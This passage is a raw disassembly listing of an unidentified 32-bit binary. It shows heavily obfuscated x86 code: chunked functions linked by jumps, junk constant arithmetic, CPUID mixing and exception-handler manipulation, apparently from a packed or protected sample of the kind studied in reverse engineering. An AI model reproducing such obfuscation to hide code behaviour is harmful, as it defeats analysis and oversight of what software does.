; FUNCTION CHUNK AT 00429264 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042A2E6 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042ADBC SIZE 0000001A BYTES
push eax
push ecx
xchg ebx, eax
push eax
jmp loc_42ADBC
sub_424627 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_424631: ; DATA XREF: sub_42ABB1-143�o
call sub_423F43
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_424637: ; CODE XREF: sub_42C0BC-14B8�j
jmp loc_422E13
; END OF FUNCTION CHUNK FOR sub_42C0BC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42463C proc near ; CODE XREF: _94j21ax3:004216C5�j
; sub_427D53:loc_4229C1�j
push ebp
mov ebp, esp
push offset sub_4220B7
jmp nullsub_98
sub_42463C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424DE8
loc_424649: ; CODE XREF: sub_424DE8:loc_422053�j
call sub_42BBF9
loc_42464E: ; CODE XREF: sub_42848B:loc_42129F�j
jmp nullsub_48
; END OF FUNCTION CHUNK FOR sub_424DE8
; ---------------------------------------------------------------------------
loc_424653: ; DATA XREF: sub_4252DD+F�o
mov eax, ds:dword_425BD4[eax*4]
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jnz loc_422FE6
; START OF FUNCTION CHUNK FOR sub_422FDC
loc_424667: ; CODE XREF: sub_422FDC+4�j
; _94j21ax3:00428AF3�j
jo loc_42A971
cmp dword ptr [ebp-1Ch], 66h
jmp loc_42A95B
; END OF FUNCTION CHUNK FOR sub_422FDC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421F28
loc_424676: ; CODE XREF: sub_421F28+1DA5�j
push esi
loc_424677: ; CODE XREF: sub_421F28:loc_421DB2�j
lea edx, [ebp-14h]
mov eax, offset dword_422278
call sub_428AE1
lea eax, [ebp-14h]
jmp loc_4217AD
; END OF FUNCTION CHUNK FOR sub_421F28
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_67. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4259BF
loc_42468D: ; CODE XREF: sub_4259BF-665�j
jmp loc_421DDD
; END OF FUNCTION CHUNK FOR sub_4259BF
; =============== S U B R O U T I N E =======================================
sub_424692 proc near ; CODE XREF: _94j21ax3:00422377�j
; _94j21ax3:00424758�p
; FUNCTION CHUNK AT 00422F8F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00423A0B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004246B3 SIZE 00000006 BYTES
xchg edi, [esp+0]
pop edi
test al, al
jz loc_4246B3
call sub_42B1F2
retn
sub_424692 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_4246A4: ; CODE XREF: sub_42A0CC+9F2�j
jmp loc_42C5DD
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_4246A9: ; CODE XREF: sub_423F55+F�j
jmp loc_427807
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F43
loc_4246AE: ; CODE XREF: sub_423F43+6�j
jmp loc_4235C0
; END OF FUNCTION CHUNK FOR sub_423F43
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424692
loc_4246B3: ; CODE XREF: sub_424692+6�j
push eax
jmp loc_423A0B
; END OF FUNCTION CHUNK FOR sub_424692
; =============== S U B R O U T I N E =======================================
sub_4246B9 proc near ; DATA XREF: sub_42AC17:loc_423E24�o
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 004219B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B608 SIZE 00000014 BYTES
call sub_42A0CC
push ecx
mov ecx, [esp+4+arg_8]
mov dword ptr [ecx], 10001h
jmp loc_42B608
sub_4246B9 endp
; ---------------------------------------------------------------------------
push eax
call sub_425475
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_150. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427A68
loc_4246D5: ; CODE XREF: sub_427A68+2CE3�j
call sub_42A3EE
call sub_424C37
loc_4246DF: ; CODE XREF: _94j21ax3:loc_428712�j
jnz loc_421A16
jmp loc_422F66
; END OF FUNCTION CHUNK FOR sub_427A68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_4246EA: ; CODE XREF: sub_4272E9-10E�j
; sub_4272E9:loc_4279B1�j
push esi
push 0FA7905CEh
pop esi
loc_4246F1: ; CODE XREF: _94j21ax3:00423C05�j
and esi, 637C6BE0h
xor esi, 5FB74A4Ah
add esi, 0C2737560h
xchg esi, [esp+4+var_4]
jmp sub_426B3C
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
loc_42470B: ; CODE XREF: _94j21ax3:00428C0D�j
xchg edi, esi
mov ecx, [esi]
and eax, edi
jmp loc_4229AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426DA4
loc_424716: ; CODE XREF: sub_426DA4:loc_42B5FC�j
add ecx, 47E5E15Eh
call sub_421142
loc_424721: ; CODE XREF: _94j21ax3:loc_42A5B3�j
; _94j21ax3:0042B62B�j
jmp loc_42A4CB
; END OF FUNCTION CHUNK FOR sub_426DA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_424726: ; CODE XREF: sub_42484C+A�j
jmp loc_42A1BA
; END OF FUNCTION CHUNK FOR sub_42484C
; =============== S U B R O U T I N E =======================================
sub_42472B proc near ; DATA XREF: sub_42AAC3+3�o
push eax
call sub_428620
loc_424731: ; CODE XREF: sub_4272E9+248B�j
jz nullsub_155
call nullsub_3
retn
sub_42472B endp
; ---------------------------------------------------------------------------
loc_42473D: ; CODE XREF: _94j21ax3:00429AE9�j
jmp loc_424D31
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429382
loc_424742: ; CODE XREF: sub_429382+D�j
jmp loc_42A5CD
; END OF FUNCTION CHUNK FOR sub_429382
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424EFA
loc_424748: ; CODE XREF: sub_424EFA+1FB4�j
jmp nullsub_88
; END OF FUNCTION CHUNK FOR sub_424EFA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_155. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426626
loc_42474E: ; CODE XREF: sub_426626+7�j
jmp loc_428FC8
; END OF FUNCTION CHUNK FOR sub_426626
; ---------------------------------------------------------------------------
loc_424753: ; CODE XREF: _94j21ax3:0042C13E�j
call sub_42C057
call sub_424692
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_206. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4239A5
loc_42475E: ; CODE XREF: sub_4239A5-1A48�j
jmp nullsub_91
; END OF FUNCTION CHUNK FOR sub_4239A5
; ---------------------------------------------------------------------------
loc_424763: ; CODE XREF: _94j21ax3:00421B0C�j
jmp loc_424010
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB30
loc_424768: ; CODE XREF: sub_42AB30-5DB9�j
rol eax, 18h
push offset sub_426B85
jmp loc_425122
; END OF FUNCTION CHUNK FOR sub_42AB30
; =============== S U B R O U T I N E =======================================
sub_424775 proc near ; CODE XREF: sub_429CCA+8�p
; _94j21ax3:0042A52E�j
; FUNCTION CHUNK AT 00423E53 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00426901 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00426A70 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00427232 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004276FA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00427942 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042C188 SIZE 0000001B BYTES
xchg eax, [esp+0]
pop eax
push eax
call sub_426B87
test eax, eax
jz loc_423E68
push 2B944D78h
jmp loc_427942
sub_424775 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_424791 proc near ; CODE XREF: _94j21ax3:004221E5�p
; _94j21ax3:00429684�j
mov [esp+0], esi
pop esi
xor eax, eax
retn
sub_424791 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_424798: ; CODE XREF: sub_423324-BDF�j
jmp loc_428D12
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
loc_42479D: ; CODE XREF: _94j21ax3:00421736�j
jmp loc_421FD7
; =============== S U B R O U T I N E =======================================
sub_4247A2 proc near ; CODE XREF: sub_42BC17:loc_423A66�j
; sub_42A81A:loc_42514F�p ...
; FUNCTION CHUNK AT 0042AE77 SIZE 0000000C BYTES
jnz sub_422D94
push ebp
mov ebp, esp
jmp loc_42AE77
sub_4247A2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4247B0: ; CODE XREF: _94j21ax3:0042A160�j
cmp ebx, edi
pop edi
and ebx, 781D922Ah
mov edx, 86B42547h
not ecx
pop edx
jmp loc_424A47
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D65
loc_4247C6: ; CODE XREF: sub_427D65+4535�j
ja loc_42429F
jmp loc_421A7E
; END OF FUNCTION CHUNK FOR sub_427D65
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_119. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4247D2 proc near ; CODE XREF: sub_423BF8+122�p
; _94j21ax3:0042B2B7�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004214DB SIZE 00000005 BYTES
mov [esp+0], edx
pop edx
xchg edx, [esp-4+arg_0]
jmp loc_4214DB
sub_4247D2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A277
loc_4247DE: ; CODE XREF: sub_42A277-479F�j
push eax
push 9495533h
xchg edx, [esp+8+var_8]
loc_4247E7: ; CODE XREF: _94j21ax3:0042BA97�j
mov eax, edx
pop edx
or eax, 5C27F3F8h
sub eax, 51AA6577h
jmp loc_4212A4
; END OF FUNCTION CHUNK FOR sub_42A277
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425983
loc_4247FB: ; CODE XREF: sub_425983:loc_4239C9�j
mov ecx, [ebx+ecx+78h]
or ecx, ecx
call sub_428418
loc_424806: ; CODE XREF: sub_422FBC+5E31�j
jz loc_4240AB
jmp loc_428E7E
; END OF FUNCTION CHUNK FOR sub_425983
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_424811: ; CODE XREF: sub_423F55:loc_424AA8�j
; sub_42484C+2175�j
jnz loc_4241E1
mov eax, [ebp-4]
cmp word ptr [eax], 2ECDh
jz loc_4241E1
call sub_4241D8
loc_42482A: ; CODE XREF: _94j21ax3:0042B1A3�j
jmp nullsub_104
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
loc_42482F: ; CODE XREF: _94j21ax3:004237D0�j
jmp loc_421CEE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C057
loc_424834: ; CODE XREF: sub_42C057-89AD�j
jmp loc_42C032
; END OF FUNCTION CHUNK FOR sub_42C057
; =============== S U B R O U T I N E =======================================
sub_424839 proc near ; CODE XREF: _94j21ax3:00422D7C�p
; sub_425324-224E�j ...
; FUNCTION CHUNK AT 00421E28 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004245C0 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042795F SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00429D1F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B59C SIZE 0000000A BYTES
mov [esp+0], edx
pop edx
test al, al
jz loc_421E28
jmp loc_429D1F
sub_424839 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42484A: ; CODE XREF: _94j21ax3:0042BA35�j
sub ebx, esi
; =============== S U B R O U T I N E =======================================
sub_42484C proc near ; CODE XREF: sub_429862-1506�p
; FUNCTION CHUNK AT 0042275A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042312A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00423637 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00423679 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423AB1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423B4A SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00423D36 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424726 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004249B4 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00424BE4 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00425013 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004266BA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004269B6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00427082 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042735F SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00427AF8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427E56 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00428498 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00428752 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428DF2 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004290D5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00429A61 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429C57 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00429CD7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A1BA SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042A6FE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AA26 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B370 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042B9A0 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042BFCA SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042C444 SIZE 00000010 BYTES
mov [esp+0], esi
pop esi
mov eax, [eax-10h]
shr eax, 6
jmp loc_424726
sub_42484C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42485B: ; CODE XREF: sub_42284F:loc_4272F8�j
cmp dword ptr [ebp-4], 5
jnz loc_4296E2
jmp loc_42A46E
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
locret_42486A: ; CODE XREF: _94j21ax3:00422C32�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422866
loc_42486B: ; CODE XREF: sub_422866+7910�j
jmp loc_421EFA
; END OF FUNCTION CHUNK FOR sub_422866
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B78
loc_424870: ; CODE XREF: sub_423B78+126B�j
jmp nullsub_28
; END OF FUNCTION CHUNK FOR sub_423B78
; ---------------------------------------------------------------------------
test eax, eax
jz loc_421242
jmp loc_42B4A2
; ---------------------------------------------------------------------------
loc_424882: ; DATA XREF: sub_421558+8246�o
xchg edi, [esp]
jmp sub_4239A5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_214. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_42488B: ; CODE XREF: sub_42C0BC:loc_422E13�j
; _94j21ax3:00422E2A�j
sub edx, 0D49E3200h
add edx, 0A82A3BBEh
add eax, edx
pop edx
jmp loc_42BBAB
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
loc_42489F: ; CODE XREF: _94j21ax3:loc_424488�j
; _94j21ax3:0042449E�j
rol ecx, 17h
add ecx, 428759CCh
add ecx, ebp
add ecx, 0DA9B2F22h
mov [ecx], eax
pop ecx
cmp dword ptr [ebp-10h], 0
jz loc_42A3E2
jmp loc_4263FC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_78. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA5F
loc_4248C3: ; CODE XREF: sub_42AA5F-F19�j
jmp loc_42A38F
; END OF FUNCTION CHUNK FOR sub_42AA5F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C057
loc_4248C8: ; CODE XREF: sub_42C057:loc_421C99�j
push edx
pushf
push 0C032154Eh
pop edx
sub edx, ds:4000F1h
rol edx, 0Ah
xor edx, 96726EECh
popf
jmp loc_4299E0
; END OF FUNCTION CHUNK FOR sub_42C057
; ---------------------------------------------------------------------------
loc_4248E5: ; CODE XREF: _94j21ax3:004250F2�j
mov ecx, [edx]
; =============== S U B R O U T I N E =======================================
sub_4248E7 proc near ; CODE XREF: sub_422EB0-1300�p
; FUNCTION CHUNK AT 00421195 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00421E71 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00421FF7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00422DDE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004230B9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00424A8C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428C7B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00429245 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042B781 SIZE 0000001D BYTES
xchg edi, [esp+0]
pop edi
mov [ebp-0Ch], eax
mov eax, [ebp-0Ch]
cmp eax, [ebp-14h]
jb loc_428C7B
mov eax, [ebp-10h]
jmp loc_422DDE
sub_4248E7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_424902 proc near ; CODE XREF: sub_426AFD:loc_4245CB�p
; FUNCTION CHUNK AT 00427FA2 SIZE 00000005 BYTES
xchg edx, [esp+0]
loc_424905: ; CODE XREF: _94j21ax3:loc_421966�j
mov edx, [esp+0]
push 0DBFB3401h
pop edx
rol edx, 19h
jmp loc_427FA2
sub_424902 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B5E
loc_424916: ; CODE XREF: sub_428B5E+32B5�j
xor ebx, 0B7445657h
add ebx, 5C67AA59h
popf
xchg ebx, [esp+0]
jmp loc_426A18
; END OF FUNCTION CHUNK FOR sub_428B5E
; ---------------------------------------------------------------------------
mov [edx], ecx
push edx
jmp sub_428811
; ---------------------------------------------------------------------------
loc_424933: ; DATA XREF: sub_42A919+D�o
jz loc_424940
mov eax, [eax]
jmp loc_425994
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A919
loc_424940: ; CODE XREF: sub_42AC2D:loc_421A87�j
; _94j21ax3:loc_424933�j ...
call sub_427D9D
loc_424945: ; CODE XREF: sub_42B238:loc_428390�j
; DATA XREF: sub_4259BF+C39�o
setnz byte ptr [ebp-5]
; END OF FUNCTION CHUNK FOR sub_42A919
; START OF FUNCTION CHUNK FOR sub_429629
loc_424949: ; CODE XREF: _94j21ax3:00422247�j
; sub_42ADA2-5212�j ...
mov al, [ebp-5]
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_429629
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B856
loc_424950: ; CODE XREF: sub_42B856-8D0C�j
jmp loc_425540
; END OF FUNCTION CHUNK FOR sub_42B856
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421689
loc_424955: ; CODE XREF: sub_421689+FBF�j
; sub_42BD03+8�j
mov byte ptr [ebp-5], 0
jmp loc_4236F3
; END OF FUNCTION CHUNK FOR sub_421689
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_4. PRESS KEYPAD "+" TO EXPAND]
db 31h
dd 0E9000001h, 437Ah, 21E9EE8Bh
db 41h, 2 dup(0)
; ---------------------------------------------------------------------------
loc_42496F: ; CODE XREF: _94j21ax3:loc_429360�j
push 0A73E087Ah
pop ebx
add ebx, 454E1064h
test ebx, 4000000h
jmp loc_425606
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B856
loc_424986: ; CODE XREF: sub_42B856+18�j
jz loc_42BFCA
jmp loc_421C9E
; END OF FUNCTION CHUNK FOR sub_42B856
; ---------------------------------------------------------------------------
loc_424991: ; CODE XREF: _94j21ax3:00423B26�j
mov edi, 0F2F23C73h
pushf
jmp loc_422615
; ---------------------------------------------------------------------------
or esi, ebx
jmp sub_42BC93
; ---------------------------------------------------------------------------
locret_4249A3: ; CODE XREF: _94j21ax3:loc_42226C�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_4249A4: ; CODE XREF: sub_421D33+764�j
rol eax, 0Bh
push eax
retn
; END OF FUNCTION CHUNK FOR sub_421D33
; =============== S U B R O U T I N E =======================================
sub_4249A9 proc near ; CODE XREF: sub_42ABD9:loc_426CC5�j
; FUNCTION CHUNK AT 00421BB5 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004245D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424D4E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425035 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00426DB5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428B92 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004297C8 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042A1F5 SIZE 00000012 BYTES
push ebp
call sub_4296C2
loc_4249AF: ; CODE XREF: sub_42C0BC-54BA�j
jmp loc_4297C8
sub_4249A9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_4249B4: ; CODE XREF: sub_42484C:loc_425019�j
; sub_42484C:loc_429A61�j
push 0E60935EEh
pop ecx
add ecx, 0FC88BF20h
xor ecx, 0E5B1B01Fh
add ecx, 0FE59D614h
jmp loc_42275A
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
and edi, 1524FD73h
jmp sub_4288D4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F65
loc_4249DC: ; CODE XREF: sub_428F65+3�j
jb sub_4289CF
add esp, 0FFFFFFF4h
mov [ebp+var_8], eax
call sub_42A67D
mov [ebp+var_4], eax
push ebp
jmp loc_422828
; END OF FUNCTION CHUNK FOR sub_428F65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421047
loc_4249F6: ; CODE XREF: sub_421047:loc_427E9C�j
lea eax, [ebp-125h]
push eax
call sub_425975
loc_424A02: ; CODE XREF: sub_423324+223D�j
jmp nullsub_53
; END OF FUNCTION CHUNK FOR sub_421047
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_142. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A389
loc_424A08: ; CODE XREF: sub_42A389+1�j
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
push offset loc_429992
jmp loc_421929
; END OF FUNCTION CHUNK FOR sub_42A389
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_424A18: ; CODE XREF: sub_4294B3-F9C�j
jno loc_4268A6
ror ebp, 1Eh
xchg ebp, [eax]
test edx, edi
jmp loc_424F8E
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4267C6
loc_424A2A: ; CODE XREF: sub_4267C6:loc_4224BA�j
xchg ebx, [esp+4+var_4]
push ecx
pushf
push 927E1A4Dh
pop ecx
rol ecx, 15h
call sub_42A83F
loc_424A3D: ; CODE XREF: _94j21ax3:004288A5�j
jmp nullsub_35
; END OF FUNCTION CHUNK FOR sub_4267C6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_424A42: ; CODE XREF: sub_42169F+3CC6�j
jmp loc_427124
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
loc_424A47: ; CODE XREF: _94j21ax3:004247C1�j
jmp loc_42751F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_424A4C: ; CODE XREF: sub_422EB0:loc_426B24�j
pop ebx
call sub_42982D
loc_424A52: ; CODE XREF: sub_422E59+5CC5�j
jmp loc_422F7B
; END OF FUNCTION CHUNK FOR sub_422EB0
; =============== S U B R O U T I N E =======================================
sub_424A57 proc near ; DATA XREF: sub_421402-1EB�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423C67 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423EE3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004240F9 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004242C4 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00428269 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00429BA0 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0042A71E SIZE 0000000F BYTES
mov [esp+0], ebp
call sub_42A36A
loc_424A5F: ; CODE XREF: sub_42B202-7E7�j
jmp loc_4242C4
sub_424A57 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4213A8
loc_424A64: ; CODE XREF: sub_4213A8+10�j
push offset loc_42571D
jmp nullsub_26
; END OF FUNCTION CHUNK FOR sub_4213A8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_424A6E: ; CODE XREF: sub_42A0CC-6800�j
jnz loc_4285AA
jmp loc_42B6D2
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA78
loc_424A79: ; CODE XREF: sub_4281A5-6D0D�j
; sub_4281A5-6D01�j ...
xor eax, eax
loc_424A7B: ; CODE XREF: sub_4281A5-5C30�j
; sub_4281A5:loc_42A455�j
pop large dword ptr fs:0
call sub_42C466
loc_424A87: ; CODE XREF: _94j21ax3:00427156�j
jmp nullsub_122
; END OF FUNCTION CHUNK FOR sub_42AA78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4248E7
loc_424A8C: ; CODE XREF: sub_4248E7-1AFA�j
jmp loc_428C7B
; END OF FUNCTION CHUNK FOR sub_4248E7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_424A91: ; CODE XREF: sub_423F55+6BE�j
push 0FF053339h
pop eax
add eax, 9146320h
xor eax, 0AA1887FAh
call sub_42922A
loc_424AA8: ; CODE XREF: _94j21ax3:004273A9�j
jbe loc_424811
loc_424AAE: ; CODE XREF: _94j21ax3:loc_42A8A4�j
mov eax, [ebp-0Ch]
loc_424AB1: ; CODE XREF: _94j21ax3:004278FA�j
push eax
call sub_42B079
jmp loc_4234F1
; ---------------------------------------------------------------------------
loc_424ABC: ; CODE XREF: sub_423F55:loc_42A566�j
push 0
push 0
push esi
jmp loc_4245F7
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
loc_424AC6: ; CODE XREF: _94j21ax3:00425903�j
jnp loc_42569C
or esi, 8E1ABA90h
jmp sub_42B772
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42972F
loc_424AD7: ; CODE XREF: sub_42972F+F�j
shl al, cl
push 0F5D85CB6h
pop edx
xor edx, 0A8AD438Bh
jmp loc_42990A
; END OF FUNCTION CHUNK FOR sub_42972F
; ---------------------------------------------------------------------------
loc_424AEA: ; CODE XREF: _94j21ax3:00427E0E�j
shr edx, 16h
; =============== S U B R O U T I N E =======================================
sub_424AED proc near ; CODE XREF: sub_429DCC+6�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423007 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428400 SIZE 00000018 BYTES
xchg ebx, [esp+0]
pop ebx
push ebp
mov ebp, esp
push 0F4ABEBB0h
mov [esp+4+var_4], ecx
jmp loc_428400
sub_424AED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424B01 proc near ; DATA XREF: sub_42446B�o
; FUNCTION CHUNK AT 00421B9E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004299E5 SIZE 00000027 BYTES
push ebp
mov ebp, esp
xchg ecx, eax
call sub_42848B
loc_424B0B: ; CODE XREF: sub_421013:loc_4216E6�j
cpuid
add [esi], eax
xor [esi], ebx
add [esi], ecx
xor [esi], edx
loc_424B15: ; CODE XREF: _94j21ax3:loc_422FB6�j
jmp loc_421B9E
sub_424B01 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_424B1A: ; CODE XREF: sub_42284F:loc_424CC8�j
push 36656C36h
pop eax
and eax, 9EB3723h
xor eax, 88521B59h
jmp loc_4232A5
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ADA2
